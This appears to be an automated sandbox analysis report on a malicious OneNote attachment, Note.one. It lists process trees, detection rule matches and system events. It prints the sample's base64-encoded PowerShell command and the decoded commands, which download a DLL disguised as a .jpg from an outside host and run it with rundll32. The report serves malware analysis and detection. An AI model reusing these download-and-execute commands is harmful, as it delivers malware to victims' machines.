Edit tour

Windows Analysis Report
Note.one

Overview

General Information

Sample Name:	Note.one
Analysis ID:	800757
MD5:	95f95c0cda4f5b050fdca00b02323d88
SHA1:	ec1daeab8b4aee1abeec3df3b82efe314c328bb9
SHA256:	636f8f5fa6d17d092007a750a38cbe4d171e608eab5b8264dbfa35209529cb9a
Infos:

Detection

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Sigma detected: Execute DLL with spoofed extension

Malicious sample detected (through community Yara rule)

Suspicious powershell command line found

Queries the volume information (name, serial number etc) of a device

Yara signature match

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Creates a process in suspended mode (likely to inject code)

Contains long sleeps (>= 3 min)

Enables debug privileges

Classification

Process Tree

System is w7x64

ONENOTE.EXE (PID: 2928 cmdline: C:\Program Files\Microsoft Office\Office14\ONENOTE.EXE" "C:\Users\user\Desktop\Note.one MD5: 6BF30A8AD15BB29FA479B700738DD188)

cmd.exe (PID: 1116 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Open.cmd" " MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

powershell.exe (PID: 1932 cmdline: powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL3Rhc3NvaW5tb2JpbGlhcmlhLmNvbS81NkcwLzAxLmdpZiAtT3V0RmlsZSBDOlxwcm9ncmFtZGF0YVxwdXR0eS5qcGcNCnJ1bmRsbDMyIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZyxXaW5kDQpleGl0DQo=')) MD5: 852D67A27E454BD389FA7F02A8CBE23F)

cmd.exe (PID: 2608 cmdline: C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmd MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

powershell.exe (PID: 1292 cmdline: powershell Invoke-WebRequest -URI https://tassoinmobiliaria.com/56G0/01.gif -Ou MD5: 852D67A27E454BD389FA7F02A8CBE23F)

rundll32.exe (PID: 1672 cmdline: rundll32 C:\programdata\putty.jpg,Wind MD5: DD81D91FF3B0763C392422865C9AC12E)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: powershell.exe PID: 1932	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x2ad5b:$b2: ::FromBase64String( 0x2ae9b:$b2: ::FromBase64String( 0x2b118:$b2: ::FromBase64String( 0x39886:$b2: ::FromBase64String( 0x399c4:$b2: ::FromBase64String( 0x5d5b6:$b2: ::FromBase64String( 0x5d6f7:$b2: ::FromBase64String( 0x633a1:$b2: ::FromBase64String( 0x63a73:$b2: ::FromBase64String( 0x63ec5:$b2: ::FromBase64String( 0x64005:$b2: ::FromBase64String( 0xd0835:$b2: ::FromBase64String( 0x1433f4:$b2: ::FromBase64String( 0x67981:$s1: -join 0x92e9:$s3: reverse 0x11474:$s3: reverse 0x7b217:$s3: reverse 0x861cd:$s3: reverse 0x131cbd:$s3: reverse 0x13ccd6:$s3: reverse 0x19497:$s4: +=

Sigma Signatures

Data Obfuscation

Sigma detected: Execute DLL with spoofed extension

Source: Process started

Author: Joe Security: Data: Command: rundll32 C:\programdata\putty.jpg,Wind, CommandLine: rundll32 C:\programdata\putty.jpg,Wind, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2608, ParentProcessName: cmd.exe, ProcessCommandLine: rundll32 C:\programdata\putty.jpg,Wind, ProcessId: 1672, ProcessName: rundll32.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Source: C:\Program Files\Microsoft Office\Office14\ONENOTE.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Source: powershell.exe, 00000006.00000002.921770739.0000000000329000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000006.00000002.921770739.0000000000329000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000006.00000002.922123045.00000000035AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tassoinmobiliaria.com/
Source: powershell.exe, 00000006.00000002.922123045.00000000035AD000.00000004.00000800.00020000.00000000.sdmp, in.cmd.4.dr	String found in binary or memory: https://tassoinmobiliaria.com/56G0/01.gif

Source: unknown

DNS traffic detected: queries for: docs.live.net

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 1932, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Source: Process Memory Space: powershell.exe PID: 1932, type: MEMORYSTR

Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: C:\Program Files\Microsoft Office\Office14\ONENOTE.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32 C:\programdata\putty.jpg,Wind

Source: C:\Windows\System32\cmd.exe	Console Write: ............................................................................h;....*...............................$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.>...............$.....D.................qJ....
Source: C:\Windows\System32\cmd.exe	Console Write: ................................p.o.w.e.r.s.h.e.l.l............................n_oJ.... ......d.qJ....1.......H.$.............T&oJ............
Source: C:\Windows\System32\cmd.exe	Console Write: ............................................................................h;..p.o.w.e..........:......................l.......................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................1.>.........................................h;...................:................$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.i.n...c.m.d. .h;...................:................$.....,.......................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ .&.&. .........d1K.....................$...h;...................:..............H.$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................s.t.a.r.t.......d1K.....................$...h;...................:..............H.$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ ./.m.i.n. .C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.i.n...c.m.d. ..........:................$.....8.......................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................................d1K.....................t...h;...................:..............x.$.............................
Source: C:\Windows\System32\cmd.exe	Console Write: ..................oJ....................................@csJ..... ......@................g.w....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..!.....................#...............................................`I........bw.....................K........!.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#...............d}Vk.....!..............................}.dw....h"......0.................{.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..!.............y=.w..../................}Vk....p.{.............................}.dw....0)......0.................!.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../...............d}Vk.....)..............................}.dw....h*......0.................{.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..!.............y=.w....;................}Vk....p.{.............................}.dw...../......0.................!.....~.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;...............d}Vk.....0..............................}.dw.....1......0.................{.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.8...............}.dw.....5......0...............(.{.....".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G...............d}Vk.....5..............................}.dw....P6......0.................{.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..!.............y=.w....S................}Vk....p.{.............................}.dw.....=......0.................!.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S...............d}Vk.....=..............................}.dw....@>......0.................{.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..!.............y=.w...._................}Vk....p.{.............................}.dw.....E......0.................!.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._...............d}Vk.....E..............................}.dw....@F......0.................{.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k....... . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....pJ......0...............(.{.....4.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k...............d}Vk....(K..............................}.dw.....K......0.................{.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..!.............y=.w....w................}Vk....p.{.............................}.dw.....P......0.................!.....l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....w...............d}Vk.....Q..............................}.dw.... R......0.................{.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ ........}Vk....p.{.............................}.dw.....U......0...............(.{.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................d}Vk....hV..............................}.dw.....V......0.................{.............................

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\ONENOTE.EXE C:\Program Files\Microsoft Office\Office14\ONENOTE.EXE" "C:\Users\user\Desktop\Note.one
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Open.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL3Rhc3NvaW5tb2JpbGlhcmlhLmNvbS81NkcwLzAxLmdpZiAtT3V0RmlsZSBDOlxwcm9ncmFtZGF0YVxwdXR0eS5qcGcNCnJ1bmRsbDMyIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZyxXaW5kDQpleGl0DQo='))
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -URI https://tassoinmobiliaria.com/56G0/01.gif -Ou
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\programdata\putty.jpg,Wind
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL3Rhc3NvaW5tb2JpbGlhcmlhLmNvbS81NkcwLzAxLmdpZiAtT3V0RmlsZSBDOlxwcm9ncmFtZGF0YVxwdXR0eS5qcGcNCnJ1bmRsbDMyIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZyxXaW5kDQpleGl0DQo='))
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -URI https://tassoinmobiliaria.com/56G0/01.gif -Ou
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\programdata\putty.jpg,Wind

Source: C:\Program Files\Microsoft Office\Office14\ONENOTE.EXE

File created: C:\Users\user\Documents\{A159FB6F-6686-4DFD-B841-8450A80BB828}

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\ONENOTE.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR667F.tmp

Jump to behavior

Source: classification engine

Classification label: mal60.evad.winONE@10/7@1/0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Source: C:\Program Files\Microsoft Office\Office14\ONENOTE.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages

Source: C:\Program Files\Microsoft Office\Office14\ONENOTE.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL3Rhc3NvaW5tb2JpbGlhcmlhLmNvbS81NkcwLzAxLmdpZiAtT3V0RmlsZSBDOlxwcm9ncmFtZGF0YVxwdXR0eS5qcGcNCnJ1bmRsbDMyIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZyxXaW5kDQpleGl0DQo='))
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL3Rhc3NvaW5tb2JpbGlhcmlhLmNvbS81NkcwLzAxLmdpZiAtT3V0RmlsZSBDOlxwcm9ncmFtZGF0YVxwdXR0eS5qcGcNCnJ1bmRsbDMyIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZyxXaW5kDQpleGl0DQo='))

Source: C:\Program Files\Microsoft Office\Office14\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1552	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 824	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Source: powershell.exe, 00000006.00000002.921770739.00000000002DE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [system.text.encoding]::ascii.getstring([system.convert]::frombase64string('dqpazwnobybvzmyncnbvd2vyc2hlbgwgsw52b2tllvdlyljlcxvlc3qglvvsssbodhrwczovl3rhc3nvaw5tb2jpbglhcmlhlmnvbs81nkcwlzaxlmdpziatt3v0rmlszsbdolxwcm9ncmftzgf0yvxwdxr0es5qcgcncnj1bmrsbdmyiem6xhbyb2dyyw1kyxrhxhb1dhr5lmpwzyxxaw5kdqplegl0dqo='))
